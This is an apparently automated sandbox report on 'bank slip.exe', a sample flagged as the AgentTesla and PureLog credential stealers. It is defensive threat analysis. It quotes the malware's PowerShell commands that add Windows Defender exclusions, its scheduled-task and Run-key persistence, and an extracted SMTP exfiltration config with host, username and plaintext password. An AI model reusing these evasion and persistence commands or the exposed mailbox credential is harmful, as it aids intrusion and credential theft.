
Windows Analysis Report
bank slip.exe

Overview

General Information

Sample name: bank slip.exe
Analysis ID: 1436607
MD5: 64ff7f01e8a040dd0708d0d3c72a09f7
SHA1: 71d66159d1414876a6ae19696a5a3d99fc5df6a6
SHA256: 0eb53728acb5e4b7c857ed35dacc4ba1264249cada90f5e69d3fde4e9b243190
Tags: exe

Detection

AgentTesla, PureLog Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Contains functionality to log keystrokes (.Net Source)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • bank slip.exe (PID: 6756 cmdline: "C:\Users\user\Desktop\bank slip.exe" MD5: 64FF7F01E8A040DD0708D0D3C72A09F7)
    • powershell.exe (PID: 5016 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\bank slip.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5856 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7484 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 3856 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mKSjGvfmIulVB" /XML "C:\Users\user\AppData\Local\Temp\tmp2859.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 7292 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • mKSjGvfmIulVB.exe (PID: 7552 cmdline: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe MD5: 64FF7F01E8A040DD0708D0D3C72A09F7)
    • schtasks.exe (PID: 7640 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mKSjGvfmIulVB" /XML "C:\Users\user\AppData\Local\Temp\tmp4AB6.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 7684 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • GUIVTme.exe (PID: 7860 cmdline: "C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • conhost.exe (PID: 7872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • GUIVTme.exe (PID: 8096 cmdline: "C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • conhost.exe (PID: 8104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.vw-rmplcars.co.in", "Username": "account.sw@vw-rmplcars.co.in", "Password": "Gagan#456"}
Source: dump.pcap; Rule: JoeSecurity_AgentTesla_1; Description: Yara detected AgentTesla; Author: Joe Security

Source: 0000000E.00000002.3246056841.0000000003092000.00000004.00000800.00020000.00000000.sdmp; Rule: JoeSecurity_AgentTesla_1; Description: Yara detected AgentTesla; Author: Joe Security
Source: 0000000E.00000002.3246056841.000000000309A000.00000004.00000800.00020000.00000000.sdmp; Rule: JoeSecurity_AgentTesla_1; Description: Yara detected AgentTesla; Author: Joe Security
Source: 00000009.00000002.2091471993.000000000304A000.00000004.00000800.00020000.00000000.sdmp; Rule: JoeSecurity_AgentTesla_1; Description: Yara detected AgentTesla; Author: Joe Security
Source: 00000000.00000002.2074900045.0000000006750000.00000004.08000000.00040000.00000000.sdmp; Rule: JoeSecurity_PureLogStealer; Description: Yara detected PureLog Stealer; Author: Joe Security
Source: 00000009.00000002.2091471993.0000000003042000.00000004.00000800.00020000.00000000.sdmp; Rule: JoeSecurity_AgentTesla_1; Description: Yara detected AgentTesla; Author: Joe Security

Source: 0.2.bank slip.exe.260f66c.1.unpack; Rule: JoeSecurity_PureLogStealer; Description: Yara detected PureLog Stealer; Author: Joe Security
Source: 11.2.mKSjGvfmIulVB.exe.304f6b4.3.unpack; Rule: JoeSecurity_PureLogStealer; Description: Yara detected PureLog Stealer; Author: Joe Security
Source: 0.2.bank slip.exe.6750000.10.unpack; Rule: JoeSecurity_PureLogStealer; Description: Yara detected PureLog Stealer; Author: Joe Security
Source: 0.2.bank slip.exe.6750000.10.raw.unpack; Rule: JoeSecurity_PureLogStealer; Description: Yara detected PureLog Stealer; Author: Joe Security
Source: 11.2.mKSjGvfmIulVB.exe.33cd7dc.1.raw.unpack; Rule: JoeSecurity_PureLogStealer; Description: Yara detected PureLog Stealer; Author: Joe Security

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\bank slip.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\bank slip.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\bank slip.exe", ParentImage: C:\Users\user\Desktop\bank slip.exe, ParentProcessId: 6756, ParentProcessName: bank slip.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\bank slip.exe", ProcessId: 5016, ProcessName: powershell.exe
Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 7292, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GUIVTme
Source: Process started; Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mKSjGvfmIulVB" /XML "C:\Users\user\AppData\Local\Temp\tmp4AB6.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mKSjGvfmIulVB" /XML "C:\Users\user\AppData\Local\Temp\tmp4AB6.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe, ParentImage: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe, ParentProcessId: 7552, ParentProcessName: mKSjGvfmIulVB.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mKSjGvfmIulVB" /XML "C:\Users\user\AppData\Local\Temp\tmp4AB6.tmp", ProcessId: 7640, ProcessName: schtasks.exe
Source: Network Connection; Author: frack113: Data: DestinationIp: 111.118.215.27, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Initiated: true, ProcessId: 7292, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49710
Source: Process started; Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mKSjGvfmIulVB" /XML "C:\Users\user\AppData\Local\Temp\tmp2859.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mKSjGvfmIulVB" /XML "C:\Users\user\AppData\Local\Temp\tmp2859.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\bank slip.exe", ParentImage: C:\Users\user\Desktop\bank slip.exe, ParentProcessId: 6756, ParentProcessName: bank slip.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mKSjGvfmIulVB" /XML "C:\Users\user\AppData\Local\Temp\tmp2859.tmp", ProcessId: 3856, ProcessName: schtasks.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\bank slip.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\bank slip.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\bank slip.exe", ParentImage: C:\Users\user\Desktop\bank slip.exe, ParentProcessId: 6756, ParentProcessName: bank slip.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\bank slip.exe", ProcessId: 5016, ProcessName: powershell.exe

Persistence and Installation Behavior

Source: Process started; Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mKSjGvfmIulVB" /XML "C:\Users\user\AppData\Local\Temp\tmp2859.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mKSjGvfmIulVB" /XML "C:\Users\user\AppData\Local\Temp\tmp2859.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\bank slip.exe", ParentImage: C:\Users\user\Desktop\bank slip.exe, ParentProcessId: 6756, ParentProcessName: bank slip.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mKSjGvfmIulVB" /XML "C:\Users\user\AppData\Local\Temp\tmp2859.tmp", ProcessId: 3856, ProcessName: schtasks.exe

Timestamp: 05/06/24-08:13:10.302990, SID: 2030171, Source Port: 49712, Destination Port: 587, Protocol: TCP, Classtype: A Network Trojan was detected
Timestamp: 05/06/24-08:12:59.940556, SID: 2851779, Source Port: 49710, Destination Port: 587, Protocol: TCP, Classtype: A Network Trojan was detected
Timestamp: 05/06/24-08:12:59.940511, SID: 2030171, Source Port: 49710, Destination Port: 587, Protocol: TCP, Classtype: A Network Trojan was detected
Timestamp: 05/06/24-08:13:10.303039, SID: 2855542, Source Port: 49712, Destination Port: 587, Protocol: TCP, Classtype: A Network Trojan was detected
Timestamp: 05/06/24-08:13:10.303039, SID: 2855245, Source Port: 49712, Destination Port: 587, Protocol: TCP, Classtype: A Network Trojan was detected
Timestamp: 05/06/24-08:13:10.303039, SID: 2851779, Source Port: 49712, Destination Port: 587, Protocol: TCP, Classtype: A Network Trojan was detected
Timestamp: 05/06/24-08:13:10.303039, SID: 2840032, Source Port: 49712, Destination Port: 587, Protocol: TCP, Classtype: A Network Trojan was detected
Timestamp: 05/06/24-08:12:59.940511, SID: 2839723, Source Port: 49710, Destination Port: 587, Protocol: TCP, Classtype: A Network Trojan was detected
Timestamp: 05/06/24-08:12:59.940556, SID: 2840032, Source Port: 49710, Destination Port: 587, Protocol: TCP, Classtype: A Network Trojan was detected
Timestamp: 05/06/24-08:12:59.940556, SID: 2855542, Source Port: 49710, Destination Port: 587, Protocol: TCP, Classtype: A Network Trojan was detected
Timestamp: 05/06/24-08:12:59.940556, SID: 2855245, Source Port: 49710, Destination Port: 587, Protocol: TCP, Classtype: A Network Trojan was detected
Timestamp: 05/06/24-08:13:10.302990, SID: 2839723, Source Port: 49712, Destination Port: 587, Protocol: TCP, Classtype: A Network Trojan was detected


AV Detection

Source: 11.2.mKSjGvfmIulVB.exe.4318670.6.raw.unpack; Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.vw-rmplcars.co.in", "Username": "account.sw@vw-rmplcars.co.in", "Password": "Gagan#456"}
Source: vw-rmplcars.co.in; Virustotal: Detection: 10%
Source: http://vw-rmplcars.co.in; Virustotal: Detection: 10%
Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe; ReversingLabs: Detection: 23%
Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe; Virustotal: Detection: 38%
Source: bank slip.exe; ReversingLabs: Detection: 23%
Source: bank slip.exe; Virustotal: Detection: 33%
Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe; Joe Sandbox ML: detected
Source: bank slip.exe; Joe Sandbox ML: detected
Source: bank slip.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: bank slip.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: NjBW.pdb source: bank slip.exe, mKSjGvfmIulVB.exe.0.dr
Source: Binary string: RegSvcs.pdb, source: GUIVTme.exe, 0000000F.00000000.2169045059.0000000000EC2000.00000002.00000001.01000000.0000000D.sdmp, GUIVTme.exe.9.dr
Source: Binary string: NjBW.pdbSHA256 source: bank slip.exe, mKSjGvfmIulVB.exe.0.dr
Source: Binary string: RegSvcs.pdb source: GUIVTme.exe, 0000000F.00000000.2169045059.0000000000EC2000.00000002.00000001.01000000.0000000D.sdmp, GUIVTme.exe.9.dr
Source: C:\Users\user\Desktop\bank slip.exe; Code function: 4x nop then lea esp, dword ptr [ebp-04h] (0_2_06A10125)
Source: C:\Users\user\Desktop\bank slip.exe; Code function: 4x nop then jmp 06A13F4Ah (0_2_06A13556)
Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe; Code function: 4x nop then jmp 076231BAh (11_2_076227C6)
Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe; Code function: 4x nop then lea esp, dword ptr [ebp-04h] (11_2_07620125)

Networking

Source: Traffic; Snort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.5:49710 -> 111.118.215.27:587
Source: Traffic; Snort IDS: 2855245 ETPRO TROJAN Agent Tesla Exfil via SMTP 192.168.2.5:49710 -> 111.118.215.27:587
Source: Traffic; Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.5:49710 -> 111.118.215.27:587
Source: Traffic; Snort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.5:49710 -> 111.118.215.27:587
Source: Traffic; Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.5:49710 -> 111.118.215.27:587
Source: Traffic; Snort IDS: 2839723 ETPRO TROJAN Win32/Agent Tesla SMTP Activity 192.168.2.5:49710 -> 111.118.215.27:587
Source: Traffic; Snort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.5:49712 -> 111.118.215.27:587
Source: Traffic; Snort IDS: 2855245 ETPRO TROJAN Agent Tesla Exfil via SMTP 192.168.2.5:49712 -> 111.118.215.27:587
Source: Traffic; Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.5:49712 -> 111.118.215.27:587
Source: Traffic; Snort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.5:49712 -> 111.118.215.27:587
Source: Traffic; Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.5:49712 -> 111.118.215.27:587
Source: Traffic; Snort IDS: 2839723 ETPRO TROJAN Win32/Agent Tesla SMTP Activity 192.168.2.5:49712 -> 111.118.215.27:587
Source: Yara match; File source: 0.2.bank slip.exe.38d7bb8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.bank slip.exe.389c998.7.raw.unpack, type: UNPACKEDPE
Source: global traffic; TCP traffic: 192.168.2.5:49710 -> 111.118.215.27:587
Source: Joe Sandbox View; IP Address: 111.118.215.27
Source: Joe Sandbox View; ASN Name: PUBLIC-DOMAIN-REGISTRYUS
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic; DNS traffic detected: DNS query: mail.vw-rmplcars.co.in
Source: bank slip.exe, mKSjGvfmIulVB.exe.0.dr; String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: bank slip.exe, mKSjGvfmIulVB.exe.0.dr; String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: RegSvcs.exe, 00000009.00000002.2091471993.000000000304A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3246056841.000000000309A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://mail.vw-rmplcars.co.in
Source: bank slip.exe, mKSjGvfmIulVB.exe.0.dr; String found in binary or memory: http://ocsp.comodoca.com0
Source: bank slip.exe, 00000000.00000002.2071630541.00000000025C1000.00000004.00000800.00020000.00000000.sdmp, mKSjGvfmIulVB.exe, 0000000B.00000002.2121255868.0000000003001000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RegSvcs.exe, 00000009.00000002.2091471993.000000000304A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3246056841.000000000309A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://vw-rmplcars.co.in
Source: bank slip.exe, 00000000.00000002.2072649003.000000000389C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2088618533.0000000000402000.00000040.00000400.00020000.00000000.sdmp, mKSjGvfmIulVB.exe, 0000000B.00000002.2126436227.00000000042DD000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://account.dyn.com/
Source: bank slip.exe, mKSjGvfmIulVB.exe.0.dr; String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: 0.2.bank slip.exe.389c998.7.raw.unpack, xljC6U.cs; .Net Code: vThHZOOISq
Source: 0.2.bank slip.exe.38d7bb8.6.raw.unpack, xljC6U.cs; .Net Code: vThHZOOISq

                        System Summary

                        barindex
                        Source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 0.2.bank slip.exe.389c998.7.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 11.2.mKSjGvfmIulVB.exe.4318670.6.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 11.2.mKSjGvfmIulVB.exe.42dd450.5.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 0.2.bank slip.exe.38d7bb8.6.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 11.2.mKSjGvfmIulVB.exe.4318670.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 11.2.mKSjGvfmIulVB.exe.42dd450.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 0.2.bank slip.exe.38d7bb8.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 0.2.bank slip.exe.389c998.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: C:\Users\user\Desktop\bank slip.exeCode function: 0_2_0259E47C0_2_0259E47C
                        Source: C:\Users\user\Desktop\bank slip.exeCode function: 0_2_04BA7C980_2_04BA7C98
                        Source: C:\Users\user\Desktop\bank slip.exeCode function: 0_2_04BA7C700_2_04BA7C70
                        Source: C:\Users\user\Desktop\bank slip.exeCode function: 0_2_04BA09200_2_04BA0920
                        Source: C:\Users\user\Desktop\bank slip.exeCode function: 0_2_04BA09100_2_04BA0910
                        Source: C:\Users\user\Desktop\bank slip.exeCode function: 0_2_068A6A000_2_068A6A00
                        Source: C:\Users\user\Desktop\bank slip.exeCode function: 0_2_068AAB600_2_068AAB60
                        Source: C:\Users\user\Desktop\bank slip.exeCode function: 0_2_068A003F0_2_068A003F
                        Source: C:\Users\user\Desktop\bank slip.exeCode function: 0_2_068A00400_2_068A0040
                        Source: C:\Users\user\Desktop\bank slip.exeCode function: 0_2_068AC1900_2_068AC190
                        Source: C:\Users\user\Desktop\bank slip.exeCode function: 0_2_06A147B80_2_06A147B8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_012CA3E89_2_012CA3E8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_012CD7809_2_012CD780
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_012C98109_2_012C9810
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_012C4AC89_2_012C4AC8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_012C3EB09_2_012C3EB0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_012C41F89_2_012C41F8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_063932789_2_06393278
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_063942889_2_06394288
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0639E0309_2_0639E030
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0639C0209_2_0639C020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_06390040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_06398EC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_06395A10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_06395330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_06393990
Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe | Code function: 11_2_0544E47C
Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe | Code function: 11_2_074BAB60
Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe | Code function: 11_2_074B6A00
Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe | Code function: 11_2_074BC190
Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe | Code function: 11_2_074B0040
Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe | Code function: 11_2_074B0006
Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe | Code function: 11_2_07623A20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_02E7A3E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_02E741F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_02E7D778
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_02E74AC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_02E73EB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_05CD8EB3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_05CDC020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_05CDE020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_05CD0D38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_05CD5330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_05CD5A10
Source: bank slip.exe | Static PE information: invalid certificate
Source: bank slip.exe, 00000000.00000002.2075170107.0000000006A80000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs bank slip.exe
Source: bank slip.exe, 00000000.00000002.2071630541.00000000025C1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename922eeda8-5113-4aeb-9b31-a4e56d848d57.exe4 vs bank slip.exe
Source: bank slip.exe, 00000000.00000000.1982387453.0000000000262000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameNjBW.exe( vs bank slip.exe
Source: bank slip.exe, 00000000.00000002.2072649003.000000000389C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename922eeda8-5113-4aeb-9b31-a4e56d848d57.exe4 vs bank slip.exe
Source: bank slip.exe, 00000000.00000002.2072649003.000000000389C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs bank slip.exe
Source: bank slip.exe, 00000000.00000002.2046567402.00000000006FE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs bank slip.exe
